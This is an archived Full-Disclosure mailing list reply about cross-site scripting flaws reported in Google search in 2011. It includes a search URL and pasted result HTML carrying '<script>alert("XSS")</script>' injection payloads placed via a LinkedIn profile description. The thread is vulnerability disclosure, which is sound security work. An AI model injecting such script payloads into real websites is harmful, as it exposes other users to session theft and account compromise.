[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Google persistent xss and another security bug
- To: sec yun <root@xxxxxxxxxx>
- Subject: Re: [Full-disclosure] Google persistent xss and another security bug
- From: Jacky Jack <jacksonsmth698@xxxxxxxxx>
- Date: Fri, 7 Jan 2011 15:55:44 +0800
Nice find
http://www.google.com/search?q=<script>alert(xss
Payload must be short within the description length.
LinkedIn</a></h3><div
class="f">Libia - "><script>alert("XSS");</script> at
"><script>alert("XSS");</script></div><div class="s">View
">'s professional profile on LinkedIn. LinkedIn is the
world's largest <br> business network, helping professionals like
"> discover inside connections to <br>
<b>...</b><br><div><cite>www.linkedin.com/pub/%2522-script-ale...
On Fri, Jan 7, 2011 at 11:17 AM, sec yun <root@xxxxxxxxxx> wrote:
>
> Some one has reported security flaws about Google on wooyun
>
> 1 Google exploit by malicious software
>
> http://www.wooyun.org/bugs/wooyun-2010-0518
>
> 2 Google persistent xss
>
> http://www.wooyun.org/bugs/wooyun-2010-01055 ; (Credit to
> http://www.wooyun.org/whitehats/SnowGZ ) Tested on ie6
>
> Google persistent xss is very funny,it looks like when the agent is
> IE6,Google will come to a different logic which will cause a persistent xss
> attack.
>
> WooYun is a connection platform for vendors and security researchers
>
> :)
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/